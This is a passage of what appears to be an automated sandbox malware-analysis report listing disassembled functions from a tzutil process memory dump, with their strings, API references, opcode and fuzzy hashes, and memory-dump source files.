                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                          • API String ID: 0-1416458366
                                                          • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                          • Instruction ID: 8c48ec0281dc80fbed33a0484e749e505fab203abed870c1c524ca3b87cb4dd3
                                                          • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                          • Instruction Fuzzy Hash: A031E2B095038CEBCF05CF94D5846DEBBB1FF04389F818559E81A6F250C775865ACB89
                                                          Function 02C9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 02CE031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CE02E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CE02BD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: fc2a8d6334dbec5da34008e8a04fd5a4caf54908f76ad7ae4900482a6071a009
                                                          • Instruction ID: c48c0447e3b51f74b56d1a0d1ec651d1f662efda60b61e6cc11240a022719132
                                                          • Opcode Fuzzy Hash: fc2a8d6334dbec5da34008e8a04fd5a4caf54908f76ad7ae4900482a6071a009
                                                          • Instruction Fuzzy Hash: 8EE1CE306087419FDB25CF28C888B6AB7E1BF84318F140A5DF5A6DB6E1D775DA44CB82
                                                          Function 02CABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02CE7B7F
                                                          • RTL: Re-Waiting, xrefs: 02CE7BAC
                                                          • RTL: Resource at %p, xrefs: 02CE7B8E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 65121fc1b92d8a0b4ece0a6c1928c3560836494b2ec0a4b8c809f34bdc923ece
                                                          • Instruction ID: 0acff83e7dfb9a839efb8bf7c80c92761228608aec6a254a6235ca4a98bec8f9
                                                          • Opcode Fuzzy Hash: 65121fc1b92d8a0b4ece0a6c1928c3560836494b2ec0a4b8c809f34bdc923ece
                                                          • Instruction Fuzzy Hash: 8541D0353007439BDB20CE25CC50B6AB7E6EF98718F140A2DE95A9B680DB32E9459F91
                                                          Function 02CAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CE728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 02CE72C1
                                                          • RTL: Resource at %p, xrefs: 02CE72A3
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02CE7294
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 7e7014d91a30822ded8039cd564057c10cbff77d5f7c702ab883a1839e2be507
                                                          • Instruction ID: 4c66021af9d8325834dba29303a4a27e16bb70d82592e1c968f6e6fa32d6478c
                                                          • Opcode Fuzzy Hash: 7e7014d91a30822ded8039cd564057c10cbff77d5f7c702ab883a1839e2be507
                                                          • Instruction Fuzzy Hash: 78410031700242ABDB21DE25CC41F6AB7A6FF94718F100619F956EB380DB21E94ADBD1
                                                          Function 02D22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 05ed6494278b3812b2276591ecde961994af2836a2d0ef45dafd10895e5c77e8
                                                          • Instruction ID: 2260981c385f4d768bdfc653dbb4603e661d827b6fd6a72822f5fb576e2b1958
                                                          • Opcode Fuzzy Hash: 05ed6494278b3812b2276591ecde961994af2836a2d0ef45dafd10895e5c77e8
                                                          • Instruction Fuzzy Hash: 8B317572A001299FDB20DE28CD44BEE77E9EF54714F44055AEC89E3200EB30AE48DF60
                                                          Function 02CB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: a2a3136d07836cf79d0f37de58f2f77c6dfa302ad07e0420652b81fe8df51ab6
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 2C91CF72E0024A9EDF26DE69C884BFEF7A5AFC4764F14461AEC51EB2C0D7318A44CB54
                                                          Function 02C79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 775935cd74aa3f141825ded6b31673f8ec7057ec4f7ea89aa07dc14c705915ec
                                                          • Instruction ID: d12c30c5a0d9e440b9dbae440085fcbfc22f13948e10b580f78edb8cf1f07570
                                                          • Opcode Fuzzy Hash: 775935cd74aa3f141825ded6b31673f8ec7057ec4f7ea89aa07dc14c705915ec
                                                          • Instruction Fuzzy Hash: 29812A75D002699BDB31DB54CC45BEEB7B8AF48714F0041EAEA19B7290E7309E85CFA1
                                                          Function 02CFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 02CFCFBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID: @$@4_w@4_w
                                                          • API String ID: 4062629308-713214301
                                                          • Opcode ID: 8f07cc8aa732c1b11d31a1e8c1647d3cf708278ba96c43c6b994edce3540c1a6
                                                          • Instruction ID: 92de897b4307e83dce6bdc957d3f58294da5a912f37850d759e2d3fb5c18b8aa
                                                          • Opcode Fuzzy Hash: 8f07cc8aa732c1b11d31a1e8c1647d3cf708278ba96c43c6b994edce3540c1a6
                                                          • Instruction Fuzzy Hash: 2C41BC71A002589FDBA1DFA5C844AAEBBB9FF84B04F00446AEA02DB750D734D905DFA1